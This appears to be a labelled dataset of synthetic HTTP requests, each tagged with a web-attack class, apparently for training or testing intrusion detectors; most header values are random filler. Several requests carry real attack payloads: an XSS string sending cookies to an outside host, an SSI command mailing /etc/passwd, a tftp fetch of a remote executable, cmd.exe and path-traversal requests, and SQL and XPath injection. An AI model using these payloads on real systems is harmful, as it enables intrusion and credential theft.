Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ucnO-sfodnc, ec-iaEorc;q=0.4
Cache-Control: 4gt=heHoa
Client-ip: 19.86.148.57
Cookie: T9-rT2DLFam=048032;6anNcclm3fS=i-_sogPv.I;6awWM@AsystemHA=0796136852
Cookie2: $Version="81"
Date: Fri, 03 Jun 05 01:21:20 CET
ETag: W/"1LVpsLgfu4F1Kyb9"
Expect: bnh5u=ermwt
From: itbeaeta@tnyantni2.be
If-Modified-Since: Wed, 21 Apr 04 12:06:26 GMT
If-Unmodified-Since: Mon, 28 Sep 09 17:15:29 CET
If-Match: *
If-None-Match: "RoXA8h4qhRsrDZAS4"
If-Range: "UGuxThT4lBRZPs1Bo"
Max-Forwards: 8770
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: N6oit uObqrnme=FqcRs
Range: 40-52491,810751-,61626-565636
Referer: http://r1okjl5j.ch/2af3esra.msf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.6 (X11; U; Linux i586 6.9; do-u6; rv:2.5.6) Gecko/87299621
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/3.9 www.ct8hao.js
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 167 www.osue.shtml "oGfiwotdrontvzljesfb" "Thu, 13 Aug 09 09:38:42 UTC"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47422
Start - Id: 41811
class: SqlInjection
GET /yauljeu.sh?sihhnsl=27&eHYstroi2t1awr=%27++group+by++users.id+having++84837%3D84837 HTTP/1.0
Host: 231.230.35.243:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: ul-iiwar, sW4mootd-d;q=0.0, 8i-9, eodlutia-aoel4er;q=0.6, nXrw-nae5Sh
Cache-Control: max-stale
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="4"
Date: Tue, 17 Jul 07 19:57:29 CET
ETag: W/"B9vez_6N2C2hWas2l"
Expect: 100-continue
From: ame9p@neehptrbo.fr
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Wed, 13 Jan 10 11:39:41 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jun 04 16:44:52 UTC
Max-Forwards: 622
MIME-Version: 8.0
Pragma: nner0e=nccidys
Proxy-Authorization: NTLM bm5leWhtb3RheFRJaWVoc3RlaGN0dG1hN2VkaUhhcWRhZFVzaGN0dW51d2U=
Authorization: FPtis ticgSoh=utIeeae
Range: 340098-821
Referer: /hL2Nman/oenzybh7/sFdes/cstbidt/insmeoi.mp3
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: rmtiooo (nXjNkwP)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7095x5636
Via: 0.0 151.82.173.75, FTP/7.6 129.236.65.13
Transfer-Encoding: 0ntna
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41811
Start - Id: 40445
class: SSI
GET /bDDQucEAn.WPf9DHk/5sswfI/Si8/b2zSrDn/heirevPgtn4re.jpg?stoRiRdeuutw=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&ohsho3rb=tyfDG0qE9i39&94Asa=uTa&aheurooNaa=i7l5wPo8euy7&0luqotqI=tpiwaedhtoNeh&prynaYxac7ina=7elrsWdbhO6gpvnde&deideapiwntsea=n2dzTzKXQXna&_IzT-L=24097072 HTTP/1.1
Host: 25.97.162.190
Connection: b0feHd4b
Accept: text/*, application/*;q=0.3, image/gif;q=0.5
Accept-Charset: iso-2022-kr;q=0.6, windows-1251, iso-2022-jp, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 157.108.242.44
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Wed, 07 Feb 07 22:11:27 CET
ETag: W/"w_7cEQg3_Tkt1w70Xs"
Expect: 100-continue
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 20 Sep 06 05:28:12 CET
If-Match: *
If-None-Match: *
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: Basic cEduNnl2Ymk6YWVveVNlOWk=
Range: 53605-7014
Referer: /rqsoJr/NhheeaT/trhs/eera.dll
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: oosnmuo/3.2.4
UA-CPU: 68000
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4401x4707
Via: FTP/2.7 www.mmasts3.js, ieetms/2.7 93.86.91.135, 1.8 www.aSsi.tiff:3
Transfer-Encoding: compress
Upgrade: Fet/1.1, nsHe/6.2
Warning: 424 www.ivstiAcN.shtml "Koasse" 
X-Forwarded-For: 211.36.21.124
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40445
Start - Id: 48145
class: XSS
GET /a9osstghschotafhl/in/dPED6EPryivO/UL./eI/anr1k5/eg3eiesalr9H0syvo8ko/59b7hl/asllts8dcijovrtlal.jpg?ZhredIEea=%26%3Cscript++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.la.com%2Fcgi-bin%2Fdetoet.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E HTTP/1.1
Host: 204.102.6.177:80
Connection: close
Accept: application/rtf, text/html;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 103.19.58.154
Cookie: e2vlasnHj= C;ni=z taqlh7hmnh
Cookie2: $Version="065"
Date: Wed, 21 Jul 04 19:54:29 UTC
ETag: W/"pYMgQR5_wNoBX6j"
Expect: fh2IAlI=egbfsrrd
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 01 May 05 23:05:48 UTC
If-Unmodified-Since: Tue, 25 Apr 06 23:49:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 741
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=env7
Range: -54
Referer: http://rtzSdide.org/npdeuf/yg7tmrb/n4ws/eha7nnoo.png
TE: trailers
Trailer: Trailer
User-Agent: ltOsci/9.9.7.8
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8071x836
Via: HTTP/0.7 22.174.38.211
Transfer-Encoding: elesn
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 670 193.220.20.205 "rSsrsuofoisnislo8" "Sun, 26 Dec 04 14:50:46 GMT"
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48145
Start - Id: 47627
class: XSS
GET /o3n4LIY25pPyio9NAO/ab3jI/g@c.b2RxTluUnP4@mn/24QPMPo5mSsoyQ7/nr08ol0d.css?Ev=aiT%2B&tgnnk=1&ao3oenea7idad4E=tPP4UfyYRda&xtermokquj=nb&nwi=7003425&rSkoqjollevo=%3Cmeta+++++http-equiv%3D++%22+++refresh++++%22+++content%3D+++%22+++0%3Burl%3Djavascript%3A++%5Balert++++%28%27taoa%27%29%3B%5D++%22+%3E&mdiebd3edeeavdm=zdhul HTTP/1.1
Host: 159.147.110.108
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aspt7tt-6oeb;q=0.4, t-fe1
Cache-Control: only-if-cached
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="477"
Date: Fri, 18 Jul 08 13:02:36 CET
ETag: W/"h1nKfSruLg2mDIS"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Mon, 19 Feb 07 09:59:49 GMT
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: "BAnmKkNBk6xqA4BRi"
If-Range: Tue, 08 Nov 05 16:14:36 UTC
Max-Forwards: 294
MIME-Version: 5.8
Pragma: 5iprcsie=0hK
Proxy-Authorization: Digest cnonce="femknga"
Authorization: NTLM c2xld3poM2ZlYXBkYU9vcm9udG9hd3Bpcnhlc2VycWdJYmF0dGlhc25sYVNk
Range: -1463,157-2
Referer: /ewhP.php
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/8.5 (X11; U; Linux i386 8.7; ev-el; rv:6.9.9) Gecko/96247412
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 1.5 138.27.107.48:4150
Transfer-Encoding: e8wno
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47627
Start - Id: 43128
class: OsCommanding
GET /ur5.css?idbOpqeyp6h=mA9Z2PUw_HU&unci8b=2084830&g9rsizu6ns=tftp+-c+get++41.90.129.159%3A%2Fonnailes%2Fnsolra.exe%7C&yftiroasyd=gHw&uolob=as5hhxpptliRm8ee9&styledV9tu2=e%27N6i%3Csr5iu2&t1t@OuFVhw0G=dha9aideyreplace&7ienhwaCht5=breirjf&tsljnis=issrsd2rje HTTP/1.1
Host: www.a7tbh.ch
Connection: close
Accept: application/*;q=0.3, image/gif, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: eoncbknn5eni=5oIC;c5fxqcnqse=85468;osooasaasoedE6h=sWaeag=?OEscNrlm9et;F7IUz3gUFX=o8SnMqkeWzJi;eetnshotrSooob=so+sxSra
Cookie2: $Version="87"
Date: Sat, 19 Sep 09 19:27:46 UTC
ETag: W/"j5PMXW@J9gNIgeb4CyoO"
Expect: 100-continue
From: ydaj1@ewfas0rh.de
If-Modified-Since: Tue, 22 Feb 05 18:46:10 GMT
If-Unmodified-Since: Tue, 31 Aug 04 16:56:28 UTC
If-Match: "@rIN0HX-gcKeZgt"
If-None-Match: *
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 9774
MIME-Version: 0.8
Pragma: kae='nrif'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: NTLM M3NlcnVlU3RkdW5zaWRucnR0b0FoZ2Flc3RyR25lcHF0b3I=
Range: 94856-,22-022
Referer: /cilCo/i3ch1r/ealrh/PtdaR/toylei.exe
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: eabsoieexg (r7F9zyRvr; nP6ZnVVI; gEFkeLwfS)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: yta/1.1 163.85.133.53, 7.0 www.qfeyson.tiff, 3.4 www.4su2d.jpg
Transfer-Encoding: identity
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43128
Start - Id: 44709
class: PathTransversal
PUT /yzieIn/sGFaCWP/optd.tiff? HTTP/1.0
Content-Length: 248
Content-Language: esssllO
Content-Encoding: compress
Content-Location: /ostfoate/net4/acNrPmuc/prpN.mpeg
Content-MD5: RWxudG81b3RzbXlubnN0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jun 08 14:44:43 CET
Last-Modified: Fri, 04 May 07 01:21:53 GMT
Host: www.hutic668u.cz
Connection: cvwhi
Accept: video/*, audio/*;q=0.2, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: be-Nfnalne, e-athaEll, dohr-wa, lnttBEe-Ennvsh;q=0.6, tbc9o-I;q=0.8
Cache-Control: max-age=816
Client-ip: 19.48.42.232
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="933"
Date: Wed, 13 Oct 04 01:14:02 CET
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 5teotwi=c4dkufDm;eodxa=0orrzrci
From: Lsoa@meyumffmar.uk
If-Modified-Since: Thu, 24 Apr 08 17:08:16 CET
If-Unmodified-Since: Wed, 21 Jul 04 14:16:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.9
Pragma: wHoo8pu=6ls
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: /itecc.mspx
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: elpOo (fqE7PI9)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: gzip
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tpnet=eg8hem&octjdarevIfjmn=tOE-4LD9vV&a4rvIRcdlqrq=ctbhosadra&Rrifo=sock_stream&Ek-a=b&eoenbU1isx=../../../usr/dsqqdsqsd.xml&reie0z=he11Qc&NmdocumentlY2=odivoiss)&3tpoa=78903155&xoah=g<&eeSRJ-=c6BQ&satGrRlsssirYta=ed0&cgietDejmdoho=970

End - Id: 44709
Start - Id: 45755
class: PathTransversal
GET /rJgh/ssrKieee4rcewil4arty/mnrUMKBGO4ijAiWw2wf/dlXYGkVu1VzW.gif?8sptnSretwUwi=32&F2zreplace5U9PG=9&zkss42eoS=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&rRIoolTaaamhx=6832789&UQD_7B=9Sidservicesd&xo4ussrasyp4li=00&5kti=2556449&Wlocationo1c@FEe=13&rns=isr%2Fsir+styledOieSmikwiM&hsanwaueHbvi=69810675 HTTP/1.1
Host: www.weoimeeei.it:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, big5;q=0.3, windows-1252, iso-2022-jp;q=0.2
Accept-Encoding: compress;q=0.7, compress;q=0.8, deflate, deflate;q=0.6
Accept-Language: *;q=0.1
Cache-Control: max-stale=24
Client-ip: 84.7.154.77
Cookie: jh0eoorbxu=3
Cookie2: $Version="51"
Date: Tue, 07 Aug 07 11:47:53 UTC
ETag: "NdluKyEsbt3wqR6uNr"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Mon, 13 Sep 04 22:37:36 GMT
If-Unmodified-Since: Fri, 08 Feb 08 18:44:02 CET
If-Match: "vlCWLiIsjU9mG9vN7c9T"
If-None-Match: "0wyDUnO7Su37hLVaUyh"
If-Range: *
Max-Forwards: 956
MIME-Version: 3.0
Pragma: s=lnv
Proxy-Authorization: powh Orrwo=yrnt5em
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /G0U1efsl/0srwea.sh
TE: chunked,trailers,deflate;q=0.7
Trailer: Range
User-Agent: Mozilla/0.8 (compatible; otrts; Windows NT; 5rEgaedidn; cuhhs)
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45755
Start - Id: 36146
class: PathTransversal
GET /zlronitwAnalpeg.aspx?O9rde=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fon%2Fesetes%2Folrale%2Filntatnion.asp HTTP/1.0
Host: www.irof4rfdt.cz:80
Connection: m5i9lroo
Accept: */*;q=0.3
Accept-Charset: cp-936;q=0.1, x-mac-korean;q=0.2, gb2312;q=0.1
Accept-Encoding: 
Accept-Language: tf7-rttnT, ihu-nBu7to;q=0.1, w-ctsrdmh;q=0.2
Cache-Control: max-stale
Client-ip: 52.138.136.254
Cookie: rqosnhho3d0me=etl;hiTqmalnt=e5so;rmandd=\'lefnisyn;ioS52lbtr=1;uqWdn=fAlnde4hfoasln0;link-7kCeall=sR3zedoiTTad9
Cookie2: $Version="95"
Date: Tue, 26 Feb 08 19:14:53 UTC
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: 100-continue
From: aitunw@tegatgpn.uk
If-Modified-Since: Sat, 04 Jul 09 12:04:57 CET
If-Unmodified-Since: Sat, 02 Jun 07 10:22:17 UTC
If-Match: "ZrqW0SqOnGgnP0t"
If-None-Match: "K43o6XIECWMNYSC"
If-Range: Fri, 26 Oct 07 21:16:20 UTC
Max-Forwards: 8
MIME-Version: 8.8
Pragma: Eohs=trob
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM U0huczFvcmg3WG5pYXc1ZWladGdua2F6b1RpZGJudG8=
Range: -52194,2-,7-21979
Referer: http://ic5cfaej.ch/rete/smaqfoT.rar
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.0 (Windows; U; WinNT 7.1; T3-nP; rv:6.4.0) Gecko/39173572
UA-CPU: MIPS
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 795x647
Via: FTP/9.8 116.51.161.190, 2.5 www.nVyts.jpg:2502, 9.8 www.6rrnh.css
Transfer-Encoding: gzip
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36146
Start - Id: 48558
class: XPathInjection
PUT /em68ieLrtrrlAgace/lnrk1Nm2WM24jP/iidrioiit/ones9soieCdito2/25BR@VlA0Y937HQycP7.exe? HTTP/1.1
Content-Length: 322
Content-Language: yf,teENN
Content-Encoding: gzip
Content-Location: http://www.sd9h.st/lecl8/soer/lrjo.tiff
Content-MD5: ZER0dG1zcnJ0OW9saGF1ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Sat, 05 Aug 06 17:40:46 UTC
Host: 161.239.113.151
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: yry9S0hp-cAe0;q=0.9, OdE-set;q=0.0, eefjm-r;q=0.3, esog-t, z7-c3d
Cache-Control: min-fresh=87
Client-ip: 26.231.14.90
Cookie: sscdoaao=okfscs2seinpe;luaieDttdn=Rdixraj?ja;oe6pnCsorrog=nrcpshfromar2a;sa6ino=80275
Cookie2: $Version="8"
Date: Sat, 21 May 05 18:18:27 GMT
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Mon, 04 Sep 06 12:57:22 UTC
If-Unmodified-Since: Tue, 11 Aug 09 16:47:25 GMT
If-Match: *
If-None-Match: *
If-Range: "SWy.FoMZ1UPqwR0UbO"
Max-Forwards: 85
MIME-Version: 8.7
Pragma: inhRhnt='aaoe0n'
Proxy-Authorization: NTLM aWlsc3Bvc2V1dG9laHRjZXJXb3V0b2VpaWFlZWVyYWF0dGZ0YWlJbGE=
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 937233-073734,-13,-768
Referer: http://ajeaeg.fr/eits5qO.pdf
TE: trailers,deflate;q=0.7
Trailer: Via
User-Agent: ilia/0.8.4
UA-CPU: StrongARM
UA-Disp: 2908,9185,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 429x1759
Via: HTTP/8.0 www.NdhwVFa.jpeg, 3.6 www.hOtna.js, 6.0 www.sehtk9.tiff
Transfer-Encoding: gzip
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 221 www.Tjeo.jpg "mhTIthjmdIiio6h9eh" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CrTmxCM3s=e:tpcsi3~wp-\r2timgEauqZ&ny6tqrmn2oey=iss0nTs ea&owTfaosh=7020&euiema=ztoidee'     or    6    <    count(path/child::*) or  'vhudimow'  ='&cvNU80=8R&it=eepassthru4&t6d8lo=t8tlGpF.q&imeooN=oyo11&hrEiwae7iroat=axmloe&om=9923&yyxragtok=dsl6nXiti&GjyDGSSDJ=rvgCEwietieuz&frnuoadaecDe=iLE_

End - Id: 48558
Start - Id: 39981
class: SSI
GET /rydDf/htft24lattws/dU/tZ-c7k9.Kz1QF4sHf8/teUr_/U1tEAbstneqlfb/5tnilfhetezsmt7tl/ifmsneNknnr2t/-U.cgi?-Iex3B9B=1%25db&enhambt=i94nvX&l6zsfnctri7l=e%40uPdJMkeJ&Wcdaeeh=sTnniaqnEeRsza&wzu6K=4eaN-O48&1nCa7X7oT6fromt=3197920&nuj=%3C%21--++%23exec++cmd%3D%22%2Fbin%2Fmail++dErst.com++++%3C++%2Fetc%2Fpasswd%22--%3E&_BEFCqOYp@S1=i%247axT&zi4eI=%5DpQ%28R&niuald=427020&sus=8 HTTP/1.0
Host: 196.14.7.197
Connection: oieehzgb
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hx3d3eh-sa;q=0.8, fc-qtntw0R;q=0.9, s-d;q=0.0, ios1z1-a;q=0.1
Cache-Control: no-cache
Client-ip: 190.151.22.46
Cookie: oo=ltc&+5sdjspcucdstdin0nsI
Cookie2: $Version="941"
Date: Sat, 28 Jan 06 24:02:40 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: hmiSezi@the9ciIr.cz
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: *
If-Range: "t7jWhpECJQT6K7-Pr"
Max-Forwards: 08
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM cmY4bG55dGl2YXJjb2ZtbWhpdGVhZTFBbWRhbnI5eWhJbXR0dGh0Z29hZWlzUw==
Authorization: Digest response="D6B4C4E88F99caAC3C05Ba6cDa898f9A"
Range: -038647,3950-886928
Referer: http://eLeRiAla.gov/75idL/shedts2/9o35ooe.tiff
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (X11; U; Linux i386 0.7; st-ev; rv:5.6.7) Gecko/54637581
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8811x8791
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39981
Start - Id: 43815
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 189.47.174.93
Connection: keep-alive
Accept: video/*, text/*;q=0.2, audio/x-wav;q=0.2
Accept-Charset: shift_jis;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: Tb6elO-eeoohoht;q=0.5, as-5r;q=0.0, Lrnel-co;q=0.4
Cache-Control: max-age=3313
Client-ip: 190.28.146.165
Cookie: 1jnidhnhicohcla=au|;tcew6sp=518477;aee=rrwxld;Eq1D=tlQZs3SyzA
Cookie2: $Version="522"
Date: Tue, 20 Feb 07 06:53:10 CET
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: uwiicm
From: cw3btxir@daeQnmosye.biz
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.3
Pragma: adets='coCaujeo'
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Basic cHBzb0U6bHloZQ==
Range: 7246-,-7950
Referer: http://ajsvn3f3.de/tyeoanva/shthis/npwc7e/eQtsu5xn.gz
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/9.7 (Windows; U; WinNT 3.7; tO-di; rv:5.9.4) Gecko/92407094
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 0.7 www.itme.htm
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43815
Start - Id: 46120
class: PathTransversal
PUT /8shtttnotsbcims/ermtzth.cfm? HTTP/1.0
Content-Length: 212
Content-Language: a
Content-Encoding: gzip
Content-Location: /ntfn/raeared.png
Content-MD5: aGRoZGphdGF0aWRhaGlkNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Feb 04 14:30:37 UTC
Last-Modified: Fri, 21 Mar 08 22:40:36 CET
Host: 130.103.57.136
Connection: crlut
Accept: video/quicktime;q=0.1, video/*, application/postscript
Accept-Charset: x-mac-icelandic, windows-1250
Accept-Encoding: gzip, compress;q=0.0, gzip, gzip, deflate
Accept-Language: s-y;q=0.5, dkrrma7l-fdv;q=0.8
Cache-Control: rte42n='roedov'
Client-ip: 168.38.37.144
Cookie: 2fjh2@U.NXs0=38;ta8I=Rse
Cookie2: $Version="429"
Date: Sun, 16 May 04 08:37:23 CET
ETag: W/"N6_VtHjK9oCwtm@"
Expect: wrwse8=toehqye;Sar7
From: heiqUte@jyli.cz
If-Modified-Since: Wed, 14 May 08 15:21:03 GMT
If-Unmodified-Since: Wed, 18 Jun 08 08:40:35 UTC
If-Match: "_Mr7eIsEX@D_CLSG"
If-None-Match: *
If-Range: Tue, 16 Oct 07 11:56:28 UTC
Max-Forwards: 33
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5-sess
Range: -03018,-4474
Referer: http://6trk.net/bhoes/sotis/etnee.sh
TE: trailers,trailers,gzip
Trailer: From
User-Agent: Mozilla/0.0 (compatible; MSIE 3.5; SunOS sun4u; ewjometvN; oam3fa)
UA-CPU: StrongARM
UA-Disp: 282,781,32
UA-Color: color16
UA-Pixels: 744x629
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: rb3ui7; otde=l4ur8n
Upgrade: cRpj/3.7
Warning: 433 88.153.253.218:7556 "oaenugabowmv" "Sun, 04 Nov 07 02:57:20 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uo=648&aeuRwme6=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html&hcezrdrurb3R9aU=3712644209&ihojdrRee5wyeo9=523&euMnna5en6edq=lphpsms&6gR5sZaeilvem=a-MF0A&EJobjectBhIccS@wv=utdeut

End - Id: 46120
Start - Id: 35807
class: XPathInjection
